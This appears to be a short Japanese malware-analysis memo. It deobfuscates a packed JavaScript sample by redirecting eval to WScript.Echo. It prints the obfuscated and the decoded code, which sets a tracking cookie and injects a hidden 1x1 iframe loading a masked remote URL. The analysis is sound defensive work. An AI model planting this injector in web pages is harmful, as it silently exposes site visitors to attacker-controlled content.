検体
eval(function packd() {p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';c = 39;k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","ac","frameborder","xxxx","src","width","height"]; while(c--){if(k[c]) {p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);}}})
見た感じだめそうだけど,evalの中身を可視化する
検体の頭に3行追加して
eval = function(input_string) {
WScript.Echo(input_string);
}
実行すると
>cscript 1.js
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
function packd() {p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';c = 39;k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","yy","frameborder","xxxx","src","width","height"]; while(c--){if(k[c]) {p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);}}}
人力で見た目をよくする(むやみにネットに検体を投げてはいけない)
function packd() {
p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';
c = 39;
k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","yy","frameborder","xxxx","src","width","height"];
while(c--){
if(k[c]) {
p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);
}
}
}
実行した時に p の値を出力するように改造
function packd() {
p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';
c = 39;
k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","yy","frameborder","xxxx","src","width","height"];
while(c--){
if(k[c]) {
p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);
}
}
WScript.Echo(p); // 追加
}
packd() // 追加
実行してみる
>cscript 1.js
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
if(document.cookie.indexOf("GOOGLE")==-1) {var _d=new Date();_d.setTime(_d.getTime()+24*60*60*1000);document.cookie="GOOGLE=123GOOGLE456;expires=" +_d.toGMTString();setTimeout(function(){var _ifr=document.CreateElement(/ifra/.source+/me/.source);_ifr.width="1";_ifr.height="1";_ifr.frameborder="0";_ifr.src="//xxxx.yy.jp/ybk/menu/inet/image/";document.body.appendChild(_ifr)},1000)}
整形すると
if(document.cookie.indexOf("GOOGLE")==-1) {
var _d=new Date();
_d.setTime(_d.getTime()+24*60*60*1000);
document.cookie="GOOGLE=123GOOGLE456;
expires=" +_d.toGMTString();
setTimeout(
function(){
var _ifr=document.CreateElement(/ifra/.source+/me/.source);
_ifr.width="1";
_ifr.height="1";
_ifr.frameborder="0";
_ifr.src="//xxxx.yy.jp/ybk/menu/inet/image/";
document.body.appendChild(_ifr)
}
,1000)
}